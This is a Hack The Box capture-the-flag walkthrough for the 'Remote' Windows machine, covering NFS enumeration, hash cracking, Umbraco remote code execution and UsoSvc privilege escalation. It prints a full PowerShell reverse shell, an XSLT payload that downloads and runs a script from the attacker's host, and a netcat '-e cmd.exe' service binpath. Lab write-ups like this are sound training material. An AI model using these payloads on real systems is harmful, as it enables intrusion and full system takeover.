Hack The Box - Remote

Remote is an easy Windows machine. An open NFS share allows you to get sources for the websute and get the administrator password. User access is retrieved through a remote command execution on the “Umbraco” CMS. Privilege escalation exploits the “UsoSvc” service to spawn an administrator shell and get access.

Disclaimer : It is a rather quick presentation that deliberately omits the various research areas. Only the actual results and a quick approach are presented.

Discovery / Enumeration

A quick port scan gives us running services on the machine.

Nmap scan report for 10.10.10.180
Host is up (0.073s latency).
Not shown: 9992 closed ports
PORT      STATE SERVICE           VERSION
21/tcp    open  ftp               Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind           2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3         2049/udp  nfs
|   100003  2,3,4       2049/tcp  nfs
|   100005  1,2,3       2049/tcp  mountd
|   100005  1,2,3       2049/udp  mountd
|   100021  1,2,3,4     2049/tcp  nlockmgr
|   100021  1,2,3,4     2049/udp  nlockmgr
|   100024  1           2049/tcp  status
|_  100024  1           2049/udp  status
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd            1-3 (RPC #100005)
5985/tcp  open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
10000/tcp open  snet-sensor-mgmt?
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=3/22%OT=21%CT=1%CU=30779%PV=Y%DS=2%DC=I%G=Y%TM=5E7771A
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=103%TI=RD%CI=RD%II=I%TS=U)S
OS:EQ(SP=100%GCD=1%ISR=103%TI=I%CI=RD%TS=U)OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%
OS:O3=M54DNW8%O4=M54DNW8NNS%O5=M54DNW8NNS%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3
OS:=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=Y
OS:%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%
OS:F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y
OS:%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%R
OS:D=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%
OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPC
OS:K=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: Randomized
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2m13s, deviation: 0s, median: 2m13s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-03-22 15:09:47
|_  start_date: N/A

NSE: Script Post-scanning.
Initiating NSE at 15:09
Completed NSE at 15:09, 0.00s elapsed
Initiating NSE at 15:09
Completed NSE at 15:09, 0.00s elapsed

NFS share and source code

First research is engaged toward the service behind the port 2049. Having never had to deal with this type of service before, some research was necessary. It turns out that this port refers to NFS network shares. It is also possible to mount these shares from a Linux machine in order to access them. For your information, from a Debian machine, it is necessary to install the nfs-common package. Mounting is simply done with the mount command. Having no information about the path, we can try to mount the root.

$ sudo mount -t nfs 10.10.10.180:/ TMPMOUNT

It works ! Perfect, so we end up with a site_backup directory containing the sources of what seems to be a website. Probably the site running on port 80 discovered before ! Moreover, sources tell us that it’s the Umbraco CMS.

$ cd TMPMOUNT 

$ ls
site_backups

$ cd site_backups 
$ ls
App_Browsers  App_Data  App_Plugins  aspnet_client  bin  Config  css  default.aspx  Global.asax  Media  scripts  Umbraco  Umbraco_Client  Views  Web.config

For simplicity and ease of use, it is advisable to copy the content of the share locally, to be more comfortable for analysis. Once this is done, you can start searching for information. With the sources of the site available, we look for configuration files or files that may contain passwords. Some quick queries over the Internet tell us that user account informations under Umbraco are stored in the Umbraco.sdf file. This one is quickly identified in the App_Data directory.

$ pwd
xx/SITE_BACKUP/App_Data

$ ls
cache  Logs  Models  packages  TEMP  umbraco.config  Umbraco.sdf

$ file Umbraco.sdf 
Umbraco.sdf: data

The file format not being directly recognized (it is a kind of database.) we will simply use the “Quick & Dirty” method to search for information, I invoke strings! :D

By the way… This method works quite well, since we quickly identify, at the beginning of the file, informations we need !

$ strings Umbraco.sdf

Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
@{pv
qpkaj
dAc0^A\pW
(1&a$
"q!Q
[...]

Several accounts, including the administrator account admin@htb.local as well as a hash, probably for the password, in SHA-1 format. This algorithm is rather well known and not recommended today due to its lack of robustness. Several online services offer to try passwird recovering from a hash, by comparing it to huge databases. If it is a weak password, the chances of success are high!

That’s how you recover a nice password :)

admin@htb.local
baconandcheese

Remote Code Execution & user shell

We are now able to work on the machine’s website. A quick look on the different pages does not reveal anything interesting. However, having the administrator login, we can connect to the interface (http://10.10.10.180/umbraco).

Then, I went to see if there were any known vulnerabilities and it turns out that an exploit for remote command execution was released last year, in 2019 (https://www.exploit-db.com/exploits/46153).

The only prerequisite, which we meet, is to have administrator access to the application.

The PoC presented in the exploit opens a calculator on the target machine. However, in our case, a reverse shell would be more appropriate ;).

Two variables are thus used :

  • proc.StartInfo.Filename for the name of the binary to execute ;
  • “cmd” to specify possible arguments.

Two ways of doing this. We could for example drop a netcat on the machine and then execute it in order to get a shell, but it is also possible to use Powershell. I chose that.

So we start by getting a Powershell reverse shell. I used the following It’s a rather simple and classic code, which can be found everywhere on the Internet. The only elements to adapt are the IP address and the port.

$socket = new-object System.Net.Sockets.TcpClient('10.10.14.5', 5577);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
  $writer.Flush();
  $read = $null;
  $res = ""
  while($stream.DataAvailable -or $read -eq $null) {
    $read = $stream.Read($buffer, 0, 1024)
  }
  $out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
  if(!$out.equals("exit")){
    $args = "";
    if($out.IndexOf(' ') -gt -1){
      $args = $out.substring($out.IndexOf(' ')+1);
      $out = $out.substring(0,$out.IndexOf(' '));
      if($args.split(' ').length -gt 1){
                $pinfo = New-Object System.Diagnostics.ProcessStartInfo
                $pinfo.FileName = "cmd.exe"
                $pinfo.RedirectStandardError = $true
                $pinfo.RedirectStandardOutput = $true
                $pinfo.UseShellExecute = $false
                $pinfo.Arguments = "/c $out $args"
                $p = New-Object System.Diagnostics.Process
                $p.StartInfo = $pinfo
                $p.Start() | Out-Null
                $p.WaitForExit()
                $stdout = $p.StandardOutput.ReadToEnd()
                $stderr = $p.StandardError.ReadToEnd()
                if ($p.ExitCode -ne 0) {
                    $res = $stderr
                } else {
                    $res = $stdout
                }
      }
      else{
        $res = (&"$out" "$args") | out-string;
      }
    }
    else{
      $res = (&"$out") | out-string;
    }
    if($res -ne $null){
        $writer.WriteLine($res)
    }
  }
}While (!$out.equals("exit"))
$writer.close();
$socket.close();
$stream.Dispose()

In order to be able to download the script from the target, we’re going to host it on a temporary web server. The http.server python module will be used for this.

$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Then, we have to prepare the payload in order to reach the ps1 file and to execute it in memory. It is also necessary to set the account credentials.

payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "IEX (New-Object Net.WebClient).DownloadString(\'http://10.10.14.5:8000/minireverse.ps1\')"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "powershell.exe"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ';

login = "admin@htb.local";
password="baconandcheese";
host = "http://10.10.10.180";

Once all the elements are ready, we run a netcat listener on our machine, then we run the python exploit. If everything works correctly, you should see a GET request go through the web server logs.

# Shell 1
$ python3 46153.py      
Start
[]

# Shell 2
$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.180 - - [30/Mar/2020 13:42:05] "GET /minireverse.ps1 HTTP/1.1" 200 -

# Shell 3
$ nc -lvvp 5577
listening on [any] 5577 ...
10.10.10.180: inverse host lookup failed: Unknown host
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.180] 49902

b00m ! A sweet user shell ! :). After user enumeration, we can get the first flag in the C:\Users\Public folder.

Reconnaissance & Information gathering

Like for any good compromission path, the next step is to gather information about the machine to identify potential weaknesses. I took advantage of working on this machine to test a tool I heard of but had never used before, called winPEAS (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS). This is a binary that automates classic enumeration tasks for privilege escalation purposes.

Spoiler: the tool a amazing.

Just like the previous reverse shell, we will use a Python web server to drop the binary. From our reverse shell, we are able to download the file directly and then execute it. For example, we can use a wget directly from the Powershell interpreter.

However, a little trick. In order to be able to execute the wget, it is necessary to run the wget as an argument to another powershell process, like this.

powershell.exe wget http://10.10.14.7:8000/winPEAS.exe -OutFile "C:\tmp\winpeas.exe"

Once it’s done, collecting can start ! The below output is truncated in order to only keep interesting parts.

.\winpeas.exe

[...]
[+] Basic System Information(T1082&T1124&T1012&T1497&T1212)
  [?] Check if the Windows versions is vulnerable to some known exploit https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits
   Hostname: remote
   ProductName: Windows Server 2019 Standard
   EditionID: ServerStandard
   ReleaseId: 1809
   BuildBranch: rs5_release
   CurrentMajorVersionNumber: 10
   CurrentVersion: 6.3
   Architecture: AMD64
   ProcessorCount: 4
   SystemLang: en-US
   KeyboardLang: English (United States)
   TimeZone: (UTC-05:00) Eastern Time (US & Canada)
   IsVirtualMachine: True
   Current Time: 3/22/2020 12:35:20 PM
   HighIntegrity: False
   PartOfDomain: False
   Hotfixes: KB4534119, KB4462930, KB4516115, KB4523204, KB4464455,

 [?] Windows vulns search powered by Watson(https://github.com/rasta-mouse/Watson)
   OS Build Number: 17763
      [!] CVE-2019-0836 : VULNERABLE
       [>] https://exploit-db.com/exploits/46718
       [>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/
      [!] CVE-2019-0841 : VULNERABLE
       [>] https://github.com/rogue-kdc/CVE-2019-0841
       [>] https://rastamousee/tags/cve-2019-0841/
      [!] CVE-2019-1064 : VULNERABLE
       [>] https://www.rythmstick.net/posts/cve-2019-1064/
      [!] CVE-2019-1130 : VULNERABLE
       [>] https://github.com/S3cur3Th1sSh1t/SharpByeBear
      [!] CVE-2019-1253 : VULNERABLE
       [>] https://github.com/padovah4ck/CVE-2019-1253
      [!] CVE-2019-1315 : VULNERABLE
       [>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html
      [!] CVE-2019-1385 : VULNERABLE
       [>] https://www.youtube.com/watch?v=K6gHnr-VkAg
      [!] CVE-2019-1388 : VULNERABLE
       [>] https://github.com/jas502n/CVE-2019-1388
      [!] CVE-2019-1405 : VULNERABLE
       [>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/
[...]

[+] Looking for AutoLogon credentials(T1012)
   Some AutoLogon credentials were found!!
   DefaultUserName               :  Administrator
[...]

[+] Modifiable Services(T1007)
 [?] Check if you can modify any service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
  LOOKS LIKE YOU CAN MODIFY SOME SERVICE/s:
  UsoSvc: AllAccess, Start

[+] Looking if you can modify any service registry()
 [?] Check if you can modify the registry of a service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services-registry-permissions
  [-] Looks like you cannot change the registry of any service...

[+] Checking write permissions in PATH folders (DLL Hijacking)()
 [?] Check for DLL Hijacking in PATH folders https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking
   C:\Windows\system32
   C:\Windows
   C:\Windows\System32\Wbem
   C:\Windows\System32\WindowsPowerShell\v1.0\
   C:\Windows\System32\OpenSSH\
[...]

Privilege escalation and root flag

Although often additional steps are necessary, for this machine, the previous enumeration phase gives all the keys you need. Indeed, it seems that the machine is sensitive to various kernel vulnerabilities. However, this is not the way we’re going to use. It also seems that we have enough privilege to interact with the UsoSvc service. Some Internet research quickly leads us to the CVE-2019-1322, which deals with the Update Orchestrator service.

The main idea behind this is to be able to change the service’s configuration to a potentially malicious binary. After that, if we are able to restart the service, the configured binary will be executed when the service is started. It gets interesting when we know that our binary would be executed with SYSTEM rights ;)

So we start by querying the service status.

sc query usosvc

SERVICE_NAME: usosvc 
        TYPE               : 30  WIN32  
        STATE              : 4  RUNNING 
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

then we can try to stop it, and checking now the status.

sc stop usosvc

SERVICE_NAME: usosvc 
        TYPE               : 30  WIN32  
        STATE              : 3  STOP_PENDING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x3
        WAIT_HINT          : 0x7530

sc query usosvc

SERVICE_NAME: usosvc 
        TYPE               : 20  WIN32_SHARE_PROCESS  
        STATE              : 1  STOPPED 
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

Perfect! Now, let’s update! The idea here is to execute a privileged reverse shell. So, using the same method as for the winPEAS binary previously, we drop a netcat on the machine.

Then, we update the configuration of the service so that it runs our netcat at boot time.

sc.exe config UsoSvc binpath="C:\tmp\nc64.exe 10.10.14.5 7788 -e cmd.exe" 
[SC] ChangeServiceConfig SUCCESS

From the attacker machine, we set up a netcat listener and we can restart the service.

# Target
sc start usosvc

# Attacker
$ nc -lvvp 7788
listening on [any] 7788 ...
10.10.10.180: inverse host lookup failed: Unknown host
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.180] 49787
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

w00ted !

Hack The Box - Cascade